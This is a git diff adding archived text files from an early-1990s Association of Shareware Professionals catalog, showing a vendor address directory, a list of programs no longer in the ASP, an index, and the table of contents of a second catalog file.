Computer Bin + Address: P.O. Box 1826, Perris, CA 92370 + Phone #: (714) 657-7821 + + Company: Computer Bug + Address: 4110 Brownsville Rd. Suite 50, Pittsburgh, PA 15227 + Phone #: (412) 882-3374 + + -- page 94 -- + + + + Company: Computers International + Address: P.O. Box 6085, Oceanside, CA 92058 + Phone #: (619) 630-0055 + + Company: Cwi Information Services + Address: P.O. Box 4851, Anaheim, CA 92803 + Phone #: (714) 879-7917 + + Company: D & L Software + Address: 15505 Wright Bros. Drive, Dallas, TX 75244 + Phone #: (214) 867-5695 + + Company: D-K Distributing + Address: 1057 W. Philadelphia Suite 243, Ontario, CA 91762 + Phone #: (714) 590-1038 + + Company: Data Outlet Software + Address: P.O. Box 776, Macon, GA 31202-0776 + Phone #: (912) 743-3732 + + Company: Del-Com + Address: 884 164 st., White Rock, BRITISH COLUMBIA V4A 45 + Phone #: (604) 535-1300 + + Company: Die Deutsche Software Bibliothek + Address: Alpenstrabe 52, 8038 Grobenzell, 8000 Munchen 19, + GERMANY + Phone #: + + Company: Dinsdale Industries + Address: 2032 Merivale Rd., Nepan, ONTARIO K2G 16 + Phone #: (613) 723-9532 + + Company: Diskey Shareware + Address: 1100 East North Blvd., Leesburg, FL 34748 + Phone #: (904) 787-3090 + + Company: Dkr Software + Address: 9 Raymond Grove, Warradale, AUSTRALIA SA 506 + Phone #: + + Company: Elite Management + Address: 5 Mayflower Cres, Hallett Cove, SOUTH AFRICA 5158 + Phone #: 08-381-4851 + + Company: Elite Shareware Labs, Inc. + Address: 1724 Sprinhill Road Suite C, Stauton, VA 24401 + Phone #: (703) 885-0726 + + Company: Envision Software + rd + Address: 720 South 333 St. #203, Federal Way, WA 98003 + Phone #: (206) 874-4044 + + -- page 95 -- + + + + Company: Falsoft Inc. + Address: 9509 US Highway 42, Prospect, KY 40059 + Phone #: (502) 228-4492 + + Company: Family Software + Address: 687 N. Summit St., Barberton, OH 44203 + Phone #: (216) 753-4483 + + Company: FF & P Enterprises + Address: 2025 Idle Hour Center, #106, Lexington, KY 40502 + Phone #: (606) 622-1587 + + Company: Finto Software + Address: Route 2 Box 44, Rosebud, TX 76570 + Phone #: (817) 583-4726 + + Company: First Choice Software Etc. + Address: P.O. Box 262477, San Diego, CA 92126 + Phone #: (619) 538-9044 + + Company: Florida Pc Library + Address: P.O. Box 2878, Leesburg, FL 32749 + Phone #: (904) 787-1741 + + Company: Folio Shareware + Address: Westbrook Works, Thornton Road, Bradford, UNITED + KINGDOM BD1 2X + Phone #: 0274-308987 + + Company: Fox Valley Technical College + Address: 1825 N. Bluemound Dr., Appleton, WI 54913 + Phone #: (414) 735-2470 + + Company: Fred'S Software + Address: 1023 Old Village Way, Oldsmar, FL 34677 + Phone #: (813) 855-9462 + + Company: Freeware + Address: 9 Alvermarle St., Newtown, AUSTRALIA 2042 + Phone #: (612) 519-4233 + + Company: G.F. Stores Ltd. + Address: R.R.# 1, Sechelt, BRITISH COLUMBIA VON 30 + Phone #: (604) 885-5025 + + Company: Gemini Software Ltd. + Address: 21 Commercial Centre, Roxboro, QUEBEC H8Y 36 + Phone #: (514) 684-3522 + + Company: Generic Computer Systems + Address: 22612 Foothill Blvd. STE. 200-C, Hayward, CA 94541 + Phone #: (415) 581-1494 + + -- page 96 -- + + + + Company: Gk Enterprises + Address: 8634 W. National Ave., West Allis, WI 53227 + Phone #: (414) 546-0111 + + Company: Gospel Electronics + Address: N. 4225 Lynden Road, Otis Orchards, WA 99027 + Phone #: (509) 928-3705 + + Company: Hammer House Of Shareware + Address: 32 Edenmore Street, Rosemount, IRELAND BT48 JP + Phone #: 0504-263779 + + Company: House Of Barlow + Address: 6612 Kisimmee Street, Tampa, FL 33616 + Phone #: (813) 837-9250 + + Company: Infinity Data Products + Address: 1404 Old Cape Rd #3, Jackson, MO 63755 + Phone #: (314) 243-8483 + + Company: Intelligent Solutions + Address: 531 West 13th , #3, Eugene, OR 97401 + Phone #: (503) 687-9134 + + Company: Jf Company'S Software Source + Address: 165 Cristich Lane Unit C, Campbell, CA 95008 + Phone #: (408) 371-9420 + + Company: Jim Thompson Enterprises + Address: 150 S. Magnolia Ave.,Ste 248, Anaheim, CA 92804 + Phone #: (714) 821-5090 + + Company: Manaccom Pty. Limited + st + Address: 1 Floor Milton Shopping Village, Baroona Rd., Milton, + AUSTRALIA 4069 + Phone #: (617) 368-2366 + + Company: Marc Routhier + Address: 3431 De La Dauversiere, Sainte-Foy, QUEBEC G1X 26 + Phone #: 653-3705 + + Company: Megamicro Company + Address: 17 Bellevue Ave., Rtes 413 & U.S. 1, Penndel, PA 19047 + Phone #: + + Company: Micro Technology + Address: 21 Vistage Drive, East Windsor, NJ 08520 + Phone #: (609) 426-0465 + + Company: Micro-Mart + Address: 792 Hamilton Street, Somerset, NJ 08873 + Phone #: + + -- page 97 -- + + + + Company: Micro-Star + Address: 1105 Second St., Encinitas, CA 92024 + Phone #: + + Company: Midwest Software Library + Address: P.O. Box 8137 University Sta., Grand Forks, ND 58202 + Phone #: 1-800-333-7614 + + Company: Mike Rowe Services + th + Address: 306-2722 5 Street, Victoria, BRITISH COLUMBIA V8T 42 + Phone #: (604) 381-2553 + + Company: Mitchell Disk + Address: P.O. Box 96, Bradford, MA 01835 + Phone #: + + Company: N.C.S.C.H. + Address: 6696 College Station, Durham, NC 27708 + Phone #: + + Company: New England Software Library + Address: 9 Davis Avenue, Shelburne, VT 05482 + Phone #: (802) 985-2928 + + Company: Next Stop Computing + Address: P.O. Box 1467, San Carlos, CA 94070 + Phone #: (415) 592-6735 + + Company: Northern Star + Address: 1280-A Belmong Street Suite 103, Brocton, MA 02401 + Phone #: (508) 580-2738 + + Company: Notor Engineering Services + Address: 1548 Arata Court, San Jose, CA 95125 + Phone #: (408) 947-8848 + + Company: Oasis Shareware + Address: P.O. Box 1558, Temple City, CA 91780-7558 + Phone #: 71650,1124 + + Company: Ocean State Shareware + Address: 38 John Street, East Providence, RI 02914 + Phone #: (401) 43402940 + + Company: Olympus Software Concepts + Address: 2110 East Katella Ave, P.O. Box 3490, Anaheim, CA 92803 + Phone #: (714) 634-4741 + + Company: Paradise Software + Address: 3111 S. Valley View Blvd # B105, Las Vegas, + NV 89102-8317 + Phone #: (702) 253-1940 + + -- page 98 -- + + + + Company: Paragon Pc Software + Address: P.O. Box 187, Moravian Falls, NC 28654-0187 + Phone #: (919) 921-2668 + + Company: Pc Assist Ltd. + Address: 4/4 Carubbers Close, Edinburgh, SCOTLAND EH1 1J + Phone #: + + Company: Pc Focus + Address: 3 Enterprise House, St. Ann's Fort, Kings Lynn, Norfolk, + UNITED KINGDOM PE30 QS + Phone #: 0553 - 691631 + + Company: Pc Independent User Group + Address: 87 High Street, Tonbridge, UNITED KINGDOM TN9 1X + Phone #: (0732) 771512 + + Company: Pc Shareware + Address: 1763 Garnet Ave., San Diego, CA 92109 + Phone #: (619) 272-6673 + + Company: Pc Support + Address: 31712-21 Casino Dr. Suite 82, Lake Elsinore, CA 92330 + Phone #: (714) 677 4757 + + Company: Pc-Sig + Address: 1030D East Duane Ave., Sunnyvale, CA 94086 + Phone #: (408) 730-9291 + + Company: Pd Softwarehouse + Address: 312 S.E. "H" St., Grants Pass, OR 94005 + Phone #: (415) 468-5150 + + Company: Pd-Service Lage + Address: Hasselstr 17, 4937 LAGE/LIPPE, GERMANY + Phone #: 0049-5232-66912 + + Company: Pegasoft Systems + Address: P.O. Box 2, Flushing, NY 11352 + Phone #: + + Company: Pendragon Public Software Library + Address: 75 Meadowbrook, E. Greenwich, RI 02818 + Phone #: + + Company: Peoples Choice + Address: P.O. Box 171134, Memphis, TN 38187-1134 + Phone #: (901) 763-0472 + + Company: Prairieware + st + Address: 3101 1 Ave N., Great Falls, MT 59401 + Phone #: (406) 727-4675 + + -- page 99 -- + + + + Company: Premium Software + Address: 24 Station Road, Barton Halsall Nr. 0., UNITED + KINGDOM L39 7N + Phone #: 0704-841213 + + Company: Princeton Software Inc. + Address: 177 Wall Street, Princeton, NJ 08540 + Phone #: (609) 924-4900 + + Company: Printers Shareware + Address: 5019-5021 West Lovers Lane, Dallas, TX 75209 + Phone #: (214) 350-1902 + + Company: Public (Software) Library + Address: P.O. Box 35705, Houston, TX 77235-5705 + Phone #: (713) 665-7017 + + Company: Public Brand Software + Address: 3750 Kentucky Ave., Indianapolis, IN 46241 + Phone #: (317) 856-6052 + + Company: Public Domain Software Library + Address: Winscombe House, Beacon RD., Crowborough, UNITED + KINGDOM TN6 1L + Phone #: + + Company: Rainbow Software + Address: P.O. Box 3908, Ontario, CA 91761 + Phone #: (714)-923-1047 + + Company: Rvh Publications + Address: 4291 Holland Road Suite 562, Virginia Beach, VA 23452 + Phone #: + + Company: Sfip + Address: 75 Nachilly Drive, New Britian, CT 06053 + Phone #: (203) 223-4974 + + Company: Shareware -Elite + Address: 25 Cades Park, Helston, UNITED KINGDOM TR13 QS + Phone #: (0326) 564164 + + Company: Shareware Express + Address: 3202 Camino Capistrano Suite 204, P.O. Box 219, San Juan + Capistrano, CA 92693-0219 + Phone #: (714) 367-0080 + + Company: Shareware Marketing + Address: , Beer, UNITED KINGDOM EX12 HW + Phone #: (0297) 24088 + + -- page 100 -- + + + + Company: Shareware Outlet + th + Address: Wayne Bldg. Ste 207, 713 110 Avenue NE, Bellevue, + WA 98004 + Phone #: (206) 646-3571 + + Company: Shareware Solutions + Address: Route 6 Box 34, Fuquay-Varina, NC 27526 + Phone #: + + Company: Shareware To Go + Address: P.O. Box 574575, Orlando, FL 32857-4575 + Phone #: (407) 679-5159 + + Company: Sim-Com Services + Address: 35158 High Dr., Abbotsford, BRITISH COLUMBIA V2S 46 + Phone #: (604) 854-DISK + + Company: Sizzleware Shareware Library + Address: P.O. Box 6429, Lake Charles, LA 70606 + Phone #: (318) 474-1548 + + Company: Smuggly Systems + Address: 2824 Mytle Ave., Granite City, IL 62040 + Phone #: (618) 451-7630 + + Company: Softa'Ware + Address: 1221 Cushman Suite E, San Diego, CA 92110 + Phone #: 1-800-369-8828 + + Company: Softec Pcl + th + Address: 880 6 Street, Maryville, MI 48040 + Phone #: (313) 364-3717 + + Company: Softshoppe, Inc. + Address: P.O. Box 3678, Ann Arbor, MI 48106 + Phone #: (313) 761-7638 + + Company: Softsource + Address: 4241 Southport Circle, Okemos, MI 48864 + Phone #: (517) 349-3650 + + Company: SOFTViLLE Computer Supplies + Address: Unit 5, Strafield Park, Elettra Avenue, Waterlooville, + UNITED KINGDOM PO7 77 + Phone #: 0705-266509 + + Company: Software Distributors Clearinghouse + Address: P.O. Box 16846, Atlanta, GA 30321-0846 + Phone #: (404) 964-1740 + + -- page 101 -- + + + + Company: Software Excitement + Address: P.O. Box 5069, Central Point, OR 97502 + Phone #: (503) 772-6827 + + Company: Software N Systems + Address: P.O. Box 59102, Schaumburg, IL 60159 + Phone #: (708) 397-1221 + + Company: Software Stop + Address: 5211 Grand Blvd., Windsor, ONTARIO N8T 12 + Phone #: (519) 974-9762 + + Company: T&z Software + Address: P.O. Box 780217, Sebastian, FL 32978-0217 + Phone #: (407) 388-3631 + + Company: Tabs + Address: 609 Edwards Ave., Kinston, NC 28501 + Phone #: (919)-527-8227 + + Company: The Computer Hut + Address: 1825-F1 Tamiami Tr., Port Charlotte, FL 33948 + Phone #: (813) 629-7720 + + Company: The Datapak Library + Address: 1226 S. Plaza, Springfield, MO 65804 + Phone #: + + Company: The Disk Park + Address: 23 Eagle Drive, Flitwick, UNITED KINGDOM MK45 RH + Phone #: 0525 717473 + + Company: The Generic Software Place Inc. + Address: P.O. Box 1177, Carmel, IN 46032 + Phone #: (317) 298-7547 + + Company: The Generic Software Place + th + Address: 2434 East 6 Avenue, Denver, CO 80206 + Phone #: (303)-399-3980 + + Company: The Pc Arcade + Address: 276 Morehouse Rd., Easton, CT 06612 + Phone #: (800) 321-0362 + + Company: The Simple Series + Address: 168 Plaistow Road, Palistow, NH 03865 + Phone #: (603) 382-8202 + + Company: The Software Kingdom + Address: P.O. Box 555, Auburn, NH 03032 + Phone #: (603) 483-5055 + + -- page 102 -- + + + + Company: The Software Shoppe + Address: P.O. Box 785, Ayer, MA 01432 + Phone #: (508) 772-7909 + + Company: Thriftyware Software/Hardware Inc. + th + Address: 82 East 39 Avenue, Vancouver, BRITISH COLUMBIA V5W 17 + Phone #: (604) 324-6701 + + Company: Titan Shareware + Address: 22 Mudys Drive, Heanor, UNITED KINGDOM DE7 7R + Phone #: 0773 712171 + + Company: Tochnot Hapisga Ltd. + Address: P.O. Box 2265, Jerusalem, ISRAEL 91022 + Phone #: 972-2-241003 + + Company: Tonehalt (Holland) Ltd. + Address: PostBus 13500, 2501 EM DEN HAAG, HOLLAND + Phone #: Fax 011-31-70-3616336 + + Company: Ultimate Data Technology + Address: 7751 Hickorylane, Findlay, OH 45840 + Phone #: (419) 423-3920 + + Company: Vasstec Ltd. + Address: 1485 Dumbarton Road, Glasgow, UNITED KINGDOM G14 9L + Phone #: (041) 954-6853 + + Company: Victor Video + Address: 2 West Main Street, Victor, NY 14564 + Phone #: (716) 924-4067 + + Company: Winners Edge Computer Software + Address: P.O. Box 233, Roy, UT 84067 + Phone #: (801) 773-4873 + + Company: Young'S Software + Address: P.O. Box 8214, Glen Ridge, NJ 07028-8214 + Phone #: (201) 783-2809 + + -- page 103 -- + + + + + _________________________________________________________________ + + PROGRAMS NO LONGER IN ASP + + The Association of Shareware Professionals, like most organiza- + tions, occasionally loses members. This is a list of shareware + products and disk vendors that were at one time covered by ASP's + guidelines but are no longer. + + We hope you find this appendix to be useful. + + + Shareware products + + In some cases, authors voluntarily retire a program and no longer + support it. These authors usually remain in the ASP and, as + members, agree to return all money sent in for the product from + that point on. + + Product: LICADD + Author : Unique Software + Comment: Retired product. + + Product: NY Edit + Author : Marc Adler + Comment: Author failed to meet all ASP requirements + + Product: NY Word + Author : Marc Adler + Comment: Author failed to meet all ASP requirements + + Product: ORDER + Author : Unique Software + Comment: Retired product. + + Product: PAL + Author : Unique Software + Comment: Retired product. + + Product: PC-Dial + Author : ButtonWare, Inc. + Comment: Retired product. + + Product: PC-Stylist + Author : ButtonWare, Inc. + Comment: Retired product. + + Product: PC-Tickle + Author : ButtonWare, Inc. + Comment: Retired product. + + -- page 104 -- + + + + Product: PENNAME + Author : R.K. West + Comment: Retired product. + + Product: Procomm 2.4.3 + Author : Datastorm Technologies, Inc. + Comment: Author resigned from ASP. + + Product: QKVALU + Author : David Crenshaw + Comment: Author resigned from ASP. + + Product: SOOTHE + Author : R.K. West + Comment: Retired product. + + Product: TapOrder + Author : Doug Swallow + Comment: Author failed to meet all ASP requirements + + Product: XD-Extended DOS + Author : ButtonWare, Inc. + Comment: Retired product. + + Product: ZPRT + Author : Unique Software + Comment: Retired product. + + + Disk vendors + + Company: BUDGETBYTES + + Company: COMPU-TECH SOFTWARE LIBRARY + + Company: EXCLUSIVE MAGICAL PUBLICATIONS + + Company: GENERIC-WARE + + Company: GRAYSON RESOURCE CENTER + + Company: OS/TECH DBA PC-LIB + + Company: PDN SOFTWARE + + Company: PHOENIX COMPUTER SERVICES + + Company: QUANTA PRESS INC + + Company: RAINWARE SOFTWARE INC + + Company: THE ORIGINAL SOFTWARE CO + + -- page 105 -- + + + + + _________________________________________________________________ + + Index + + 4DOS 18, 78 BY THE NUMBERS 7, 79 + 4EDIT 18 + 4PRINT 60, 78 C + 4ZIP 19 C language See: + Programming + A CAD/CAM software See + A86 78 Also: Graphics + Accounting See Also: CADET 16, 80 + Business applications Calendar Keeper 27, 80 + Aeius Gradebook 72, 78 Calendars See Also: + ANARKEY 34, 79 Astronomy & Geology, + Applets 34, 79 See Also: Desktop + Archivers See Also: applications + Backup/restore CAPBUF 38, 79 + Arrow 79 catalog 6 + AS-EASY-AS 3, 16, 79 Centiwrite 73, 80 + ASP Centiwrite Developer's + application form 6 Kit 62, 80 + statement of purpose Checking accounts See: + 6 Accounting, See Also: + Assembler language See: Finances + Programming CheckMate-GL 80 + Astronomy & Geography CheckMate(tm) 80 + See Also: Graphics CHEQUE-IT-OUT 45, 80 + ATC 48, 79 CIPHER 49, 79, 81 + Aura Reading 7, 79 Citizen 60, 79 + CLICHE FINDER 73, 79 + B Clocks See: Calendars & + Backup/restore See clocks + Also: Archivers, See CMTS 17, 81 + Also: Disk utilities Code to Code 74, 81 + Baker's Dozen 29, 79 Command Post 34, 35, 79 + BASIC See: Programming Communications See + BassMap 48, 79, 81 Also: Graphics, See + BATUTIL 37, 79 Also: Programming + BESTGUES 69, 80 Compilers See: + Bibliography See: Word Programming + processors CompuServe See: + Billing See: Accounting Communications + Bmenu 34, 80 ConvDW 44, 81 + BOOK OF CHANGES 7, 79 CONVERT 62, 81 + BOOT.SYS 29, 38, 80 CREATIVITY PACKAGE 74, + BORDER 48 79 + Border 79 CROSSWORD CREATOR 49, + Bosskey Package 80 81 + Browse/2 80 Crystal Ball 8, 79 + Browser 43, 79 CUDM 30, 81 + Business graphics See: CUDUP 30, 81 + Graphics CURSES! 49, 79 + + -- page 106 -- + + + + CVT2SB 63, 81 Easy Project 69, 83 + CVT2TB 81 EasyCASE 63, 83 + ECOMASTER 50, 79 + D Education See: + D86 78 Tutorials & Education + DARN! 27, 81 EGATrek 50, 79, 81 + Databases See Also: EIS 10, 83 + Statistics Envelope software See: + DAYO AP 3, 81 Printer utilities + DAYO AR 3, 81 Extended Batch Language + DAYO BACK ORDERS 11, 81 83 + DAYO CLOCK 17, 81 + DAYO EOP 4, 81 F + DAYO GL 4, 81 FastBucks 45, 83 + DAYO INDEX 22, 81 FaxCtrl 43, 81 + DAYO Inventory 23, 81 FBNCAT 58, 83 + DAYO Look Up 23, 81 FD 32 + DAYO MENU 35, 81 FFOUR 32, 81 + DAYO MRP 11, 81 FICTIONARY 50, 79 + DAYO PASSWORDS 23, 81 FILE PATCH 38, 82 + DAYO POS 12, 81 File utilities See + DAYO Price Book 12, 81 Also: Printer + DAYO Quotes 12, 81 utilities + DAYO SMART REPORTS 13, FINANCE MANAGER II 13, + 81 46, 80 + DAYO UPDATE 24, 81 Finances See Also: + Deception programs See: Accounting, See Also: + Games & Leisure Income taxes + Deskfonts 70, 82 FLAG 24, 83 + Desktop applications FLODRAW 55, 83 + See Also: Calendars Formatters See: Disk + Desktop publishing See: utilities + Word processors FormGen 47 + DIRECTMAINT 35, 82 FormGen Fill 48 + DIRECTOR 36, 82 Fortune Teller 8, 79 + Directory Freedom 36, Fractals See: Graphics + 82 + DIREDIT 31, 82 G + Disk formatters See: GALAXY 74, 84 + Disk utilities Games & Leisure See + Disk utilities See Also: BBS software, + Also: File utilities See Also: Programming + Document Control 13, 82 Geology See: Astronomy + Don't Forget 28 & Geology + DOS menus See Also: GEOMANCY 8, 79 + Multitaskers, See GRAB Plus 60, 84 + Also: Tutorials Graphics See Also: + DRAFT CHOICE 16, 79 Games, See Also: + DUP 31 Astronomy & + Geography, See Also: + E CAD/CAM software, See + Ease-Up 19, 82 Also: Printer + Easy Access 36, 82 utilities + Easy Format 31, 83 + + -- page 107 -- + + + + H Modems See: + HARD AT WORK 51, 79 Communications + Hard Disk Menu 37, 84 MORSOFT CALCULATOR 28, + HDTEST 32, 82 82 + Hearts 51, 84 Mortgage calculation + Hints 2 See: Finances + Home Office Tax Multitaskers See Also: + Deduction Calculator DOS shells + 1989 57, 84 + HUGO'S HOUSE OF HORRORS N + 51, 84 NAMEGRAM 53, 85 + New Age See: Astrology + I & New Age + Income taxes See Also: Newkey 39, 85 + Accounting, See Also: Numerology See: + Finances Astrology & New Age + InstaCalc 84 + O + J Occult See: Astrology & + JADU 44, 84 New Age + JEPRS 75, 84 ONCEADAY 39, 81 + OVL 85 + K + KBSpeed 79 P + KISBILL 4, 81 PAL 28, 85 + Klondike 52, 84 PALRUN 39, 85 + KWIKSTAT 85 PAR 25, 81 + Pascal See: Programming + L PathProj 56, 86 + LaserLabel 60, 84 Payroll software See: + LCG/Remind 10, 85 Business applications + Leisure See: Games & PBWindows 63, 86 + Leisure PC-ACCOUNT 86 + Lottery See: Statistics PC-CAI 72, 85 + Lotto Challenger 71, 85 PC-Calc+ 5, 79 + Lotto Prophet 71, 85 PC-DEAL 5 + LOVEDOS 79 PC-Draft-CAD 16, 86 + PC-Draft II 56, 86 + M PC-FASTYPE 86 + M-LABEL 58, 79 PC-File 24 + Macros See: Keyboard PC-File+ 79 + macros PC-File:dB 79, See: PC- + Magic Brush 55, 82 File + Mah Jongg 52, 79, 81 PC-IDENT 33, 86 + MAILLIST 58, 79 PC-INFO 33, 86 + MakeTable 81 PC-Stylist 75 + MAXI Form 33, 85 PC SYSTEM MANAGER 37, + Mayan Calendar 9, 79 82 + Menu applications See: PC-TAX88 86 + DOS menus PC-Type II 75, 79 + MicroSoft Windows See: PC-XREF6 86 + DOS menus PCBoard doors See: BBS + MLSIM 14, 85 software + PCBUDGET 47, 86 + + -- page 108 -- + + + + PCFMT 19, 81 S + PDS*BASE 64, 86 SANDDS MOVIE GUIDE 25, + PDS*EPRICE 14, 86 88 + PDS*MEMBER 18, 86 SCHOOL-MOM 72 + PDS*QUOTE 14, 86 SCRNCH 88 + pEDIT 76, 86 Searchlight 11, 88 + PERSONAL TAROT(tm) 8, SETTIME 17 + 79 SHERLOCK 86 + PIANOMAN 59, 85 SHEZ 6 + POETRY GENERATOR 53, 79 Shooting Gallery 54, + Point & Shoot Backup/ 79, 81 + Restore 87 SHUTTLE 9 + Point & Shoot Hard Disk SOFF BALLS 26, 88 + Manager 87 STACKEY 37, 79 + Point & Shoot Home STARDIAL 21, 88 + Manager 87 STS26 88 + Poker Solitaire 53, 84 SUPER MAKE(tm) 66, 81 + PopDBF 25, 79 SuperFly 54 + Printer utilities See SWAPDOS 88 + Also: Disk utilities, SWAPDT 40, 88 + See Also: Graphics SWAPMM 40, 88 + PrintGL 61, 87 SWAPMT 40, 88 + PrintPlus 61, 87 SWAPNG 41, 88 + PRO-CR 69, 84 SWAPSH 41, 88 + Profonedit Plus 20, 87 SWAPSK 41, 88 + Programmer's SWAPSP 42, 88 + Productivity Pack 64, SWAPTN 42, 88 + 83 + Programming See Also: T + Tutorials TAPLEX 21, 78 + ProQube Lite 5, 84 TAPMARK 21, 78 + PULL 64, 87 TAPUTIL 89 + PULLC 65, 87 Taxes See: Income taxes + TBFMT 66, 81 + Q Technical Editor 77, 89 + Qanalyst 20, 87 TesSeRact 66, 67, 68, + QEdit 76, 87 88 + QFE 20, 87 Text editors See: Word + QPACS 47, 87 processors + QubeCalc 84 TextCon 44, 81 + QWIK 64, 65, 68, 87 TextOut/5 45, 81 + QWIKC 65, 68, 87 the last word 54, 82 + Thesaur Plus 77, 89 + R Time is Money 89 + Ravitz Editor 76, 87 TIMES2 42, 81 + Recursive Realm 56, 87 TIMESTAX 15, 89 + RelaxR 57, 86 Tips 2 + Religion See: Church & Toolkits See: + religion Programming + REMIND! 29, 88 TOUCH TYPE TUTOR 84 + RLEPRT 62, 88 TSR Download 70, 82 + Rubicon Publisher 77, TTIME 22, 88 + 88 TTT 73 + RXtraces 57, 86 TUTOR.COM 89 + + -- page 109 -- + + + + Tutorials & Education WORKBASE 27, 79 + See Also: Games WORLD29 9, 88 + WORLD NAME GAME 55, 88 + U Writers See: Word + Utilities See: processors + Programming Writing style See: Word + processors + V + Videocat 26, 89 X + VINO:FILE 26, 89 XDIR 33 + VMiX 59, 89 XRS 22, 90 + + W Z + What's Up 43 ZAPCODE 61, 90 + WILDCAT! 90 Zip Code utilities See: + WNDW 64, 68, 87 Business applications + WNDWC 65, 68, 87 ZIPKEY 15, 78 + Word processors See ZPAY 3 15, 84 + Also: File utilities +  \ No newline at end of file diff --git a/textfiles.com/computers/asp5202.txt b/textfiles.com/computers/asp5202.txt new file mode 100644 index 00000000..1b2dc61a --- /dev/null +++ b/textfiles.com/computers/asp5202.txt @@ -0,0 +1,27056 @@ + + i + + + + + + Contents + + + ASP Shareware Catalog for BBS users 2 + + Chapter 1: How to read this catalog 3 + 1.1 Minimum requirements . . . . . . . . . . . . 3 + 1.2 Registration benefits . . . . . . . . . . . . 4 + 1.3 Sample product description . . . . . . . . . 5 + + Chapter 2: Utilities 7 + 2.1 Disk utilities . . . . . . . . . . . . . . . 7 + 2.1.1 Disk cataloging . . . . . . . . . . . . 10 + 2.1.2 Hard disk utilities . . . . . . . . . . 13 + 2.1.3 Floppy disk utilities . . . . . . . . . 24 + 2.2 File utilities . . . . . . . . . . . . . . . 27 + 2.2.1 Backup/restore . . . . . . . . . . . . . 29 + 2.2.2 Encryption & security . . . . . . . . . 33 + 2.2.3 File archivers . . . . . . . . . . . . . 34 + 2.2.4 File comparison . . . . . . . . . . . . 37 + 2.2.5 File conversion . . . . . . . . . . . . 38 + 2.2.6 File viewers . . . . . . . . . . . . . . 39 + 2.3 Hardware utilities . . . . . . . . . . . . . 40 + 2.3.1 CPU & memory utilities . . . . . . . . . 40 + 2.3.2 Keyboard utilities . . . . . . . . . . . 41 + 2.3.3 Screen utilities . . . . . . . . . . . . 42 + 2.3.3.1 EGA/VGA . . . . . . . . . . . . . . 43 + 2.3.4 286/386/486 utilities . . . . . . . . . 43 + 2.4 Printer utilities . . . . . . . . . . . . . . 43 + 2.4.1 Printer control . . . . . . . . . . . . 46 + 2.4.2 Bar codes . . . . . . . . . . . . . . . 49 + 2.4.3 Printer specific . . . . . . . . . . . . 49 + 2.4.3.1 Epson . . . . . . . . . . . . . . . 49 + 2.4.3.2 HP DeskJet . . . . . . . . . . . . 50 + 2.4.3.3 HP LaserJet . . . . . . . . . . . . 52 + 2.4.3.4 PostScript . . . . . . . . . . . . 59 + 2.4.4 Envelope addressers . . . . . . . . . . 60 + 2.5 System Utilities . . . . . . . . . . . . . . 62 + 2.5.1 Operating systems . . . . . . . . . . . 62 + 2.5.2 Multi-OS utilities . . . . . . . . . . . 62 + 2.5.3 Command processors . . . . . . . . . . . 63 + 2.5.4 Batch & macro utilities . . . . . . . . 63 + 2.5.5 Configuration utilities . . . . . . . . 70 + 2.5.6 Recovery utilities . . . . . . . . . . . 72 + 2.5.7 Screen capture . . . . . . . . . . . . . 72 + 2.5.8 Other . . . . . . . . . . . . . . . . . 73 + 2.6 Desktop utilities . . . . . . . . . . . . . . 75 + 2.6.1 Multi-function . . . . . . . . . . . . . 75 + 2.6.2 Calculators . . . . . . . . . . . . . . 76 + 2.6.3 Calendars . . . . . . . . . . . . . . . 77 + 2.6.4 Clocks . . . . . . . . . . . . . . . . . 81 + 2.6.5 Phone dialers . . . . . . . . . . . . . 82 + + ii + + + + 2.6.5.1 Rolodex programs . . . . . . . . . 85 + 2.6.6 Alarms . . . . . . . . . . . . . . . . . 85 + 2.6.7 Notepads . . . . . . . . . . . . . . . . 86 + 2.6.8 Personal information managers (PIMs) . . 86 + 2.6.9 Time management . . . . . . . . . . . . 90 + 2.6.10 Journal/diary programs . . . . . . . . 92 + 2.7 Menu systems & file managers . . . . . . . . 93 + 2.7.1 Menu systems . . . . . . . . . . . . . . 93 + 2.7.2 File managers . . . . . . . . . . . . 100 + 2.7.3 Combined MS/FMs . . . . . . . . . . . 104 + 2.7.4 MS/FMs for developers . . . . . . . . 105 + 2.7.5 Work environment managers . . . . . . 106 + 2.8 Security programs . . . . . . . . . . . . . 106 + 2.8.1 Virus/Trojan detectors . . . . . . . . 107 + 2.8.2 Virus cleanup/removal . . . . . . . . 109 + 2.8.3 System activity monitors . . . . . . . 109 + 2.8.4 File integrity monitors . . . . . . . 109 + 2.9 Software tools . . . . . . . . . . . . . . 109 + 2.9.1 For multiple programs . . . . . . . . 109 + 2.9.2 For Sidekick . . . . . . . . . . . . . 110 + 2.9.2.1 Sidekick Plus specific . . . . . 111 + 2.9.3 For PC Tools . . . . . . . . . . . . . 112 + 2.9.3.1 Deluxe Shell specific . . . . . . 112 + 2.9.4 For 4DOS . . . . . . . . . . . . . . . 112 + 2.9.5 For Lotus . . . . . . . . . . . . . . 113 + 2.9.6 For Norton . . . . . . . . . . . . . . 113 + 2.9.6.1 For Norton Guides . . . . . . . . 113 + 2.9.6.2 For Norton Utilities . . . . . . 113 + 2.9.7 For PKWARE . . . . . . . . . . . . . . 113 + 2.9.7.1 For PKZIP/PKUNZIP . . . . . . . . 113 + 2.9.8 For other . . . . . . . . . . . . . . 114 + 2.10 Other . . . . . . . . . . . . . . . . . . 115 + + Chapter 3: Writing applications 116 + 3.1 Text editors . . . . . . . . . . . . . . . 116 + 3.2 Text organizers . . . . . . . . . . . . . . 121 + 3.3 Word processors . . . . . . . . . . . . . . 122 + 3.4 Desktop publishing . . . . . . . . . . . . 124 + 3.5 File format translators . . . . . . . . . . 128 + 3.6 Dictionaries . . . . . . . . . . . . . . . 130 + 3.7 Document boilerplates . . . . . . . . . . . 130 + 3.7.1 Business specific . . . . . . . . . . 130 + 3.8 Creativity & brainstorming . . . . . . . . 130 + 3.9 Software tools . . . . . . . . . . . . . . 132 + 3.9.1 For multiple programs . . . . . . . . 132 + 3.9.2 For Word . . . . . . . . . . . . . . . 132 + 3.9.2.1 Word for Windows . . . . . . . . 132 + 3.9.3 For other . . . . . . . . . . . . . . 133 + 3.10 Other . . . . . . . . . . . . . . . . . . 134 + + Chapter 4: Spreadsheet applications 135 + 4.1 Spreadsheet programs . . . . . . . . . . . 135 + 4.2 Boilerplates/templates . . . . . . . . . . 136 + 4.3 Software tools . . . . . . . . . . . . . . 136 + + iii + + + + 4.3.1 For multiple programs . . . . . . . . 136 + 4.3.2 For Lotus . . . . . . . . . . . . . . 136 + + Chapter 5: Database applications 137 + 5.1 Relational database managers . . . . . . . 137 + 5.2 Flat-file database managers . . . . . . . . 140 + 5.3 Mailing label systems . . . . . . . . . . . 142 + 5.4 File format translators . . . . . . . . . . 147 + 